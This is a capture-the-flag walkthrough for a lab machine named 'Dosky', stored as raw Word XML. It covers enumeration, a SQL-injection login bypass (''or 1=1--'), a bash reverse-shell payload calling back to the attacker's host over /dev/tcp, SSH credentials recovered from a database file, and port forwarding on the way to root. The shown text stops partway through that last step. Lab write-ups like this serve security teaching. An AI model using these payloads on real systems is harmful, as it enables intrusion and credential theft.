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DOSKY</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hmx6gmmd9gxl"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understand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xadnfh24hewi"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308100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87"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h9vflrmjgcbw"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have port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">indicating that a website is running. We also have port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">22 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10515</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which we will use later. So we open the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> address in our browser.</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nvunaqkdwifs" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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3657600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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9pzswo6k1hr8" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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We have the site's initial page talking about a program →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Dosky</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how it works, etc.</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ce8w70m3fbpr" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FUZZ:</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from that wordlist, then checks the HTTP status code.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you are using Kali or ParrotOS, you can find these wordlists at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7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/download</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/admin</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/updates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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/bug_bounty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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p7ug98p38r9g" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now let’s take a look at the directories returning status code 200 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bug_bounty:</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75000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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bug_bounty.png</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Email:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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w4zkchfvkcxy" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/updates:</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88"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ybyhr9cg8co7" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: “Recently, we discovered through a report that our servers may be handling an unauthenticated RCE (Remote Code Execution). It was affecting all Dosky systems and automated servers. Exploits were created, making it simple to compromise the vulnerable server.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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1fup8u8ybwor" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/download:</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03700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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/download</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we have a Python script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Script:</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029200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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3qlfa04nd8lt" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin:</w:t>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8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790ww4eokd8l" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi on the Login Page:</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have a login page. We can try using the email found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/updates</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but we don’t have the password, so I will attempt to bypass the login using SQL Injection.</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hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Email: hanny@dosky.com</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Password: 'or 1=1--</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got in!</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access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dashboard and can see some report emails.</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60925"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="30612" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="29609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reviewing the emails, I see the report that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victoria </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sent.</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She sent an email explaining a Remote Code Execution vulnerability and included a proof of concept exploit.</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7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dvg4488228yw" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>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832100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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4trc6tmqqwyv" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note in /updates:</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27100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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exploit this vulnerability, the bash payload used to establish the connection had to be encoded in hexadecimal and sent to the server while a listener waited for a callback connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Blind command injection did not return any visual confirmation that the vulnerability was successfully executed, so a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell had to be the best way to prove it.</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all this, we will now execute the Python script downloaded from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/download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9">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lya92d3adzh6" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>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1xx175a7w7ab" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>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on4qu4xtcqu3" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>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wlxy7ikawkbu" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation:</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64000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dosky_client.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We will use the payload found in the exploit that Victoria sent in the email. We can ignore the login and password part and attempt to inject the payload directly into the terminal.</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to listen on a port to receive our connection.</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70"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Now we paste our payload into the script terminal:</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%R%exec%%?$sleep 5s &amp;&amp; exec bash -i &amp;&gt;/dev/tcp/&lt;IP-VPN&gt;/9001 &lt;&amp;1</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7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 😀</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76400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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56q8bbongpps" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY Shell</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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in Hanny’s home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Digging deeper, I find a file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.db</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing Hanny’s SSH credentials.</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45000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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these credentials to connect via SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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hanny:h4nn7dev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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2471c6bzc3e" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>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3352800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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humit1lomq" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root</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into Hanny’s account, I execute the following command:</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netstat -nlapt</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Basically, this command displays basic statistics about all network activity and informs users which ports and addresses corresponding connections (TCP, UDP) are running on and which ports are open.</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notice a port that stands out — port 5000.</w:t>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38500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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I will use the curl command to verify whether this is an HTTP service:</w:t>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7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confirm that a web application is running on that port.</w:t>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I will forward port 5000 to my local machine so we can open the application in our browser. For this, I will use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 (we could also use SSH or Meterpreter, but I prefer Chisel).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">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GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTP</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId31">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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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vttfkyahwpn" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On My Local Machine:</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server -p 9000 --reverse</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6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But first, let’s download </w:t>
      </w:r>
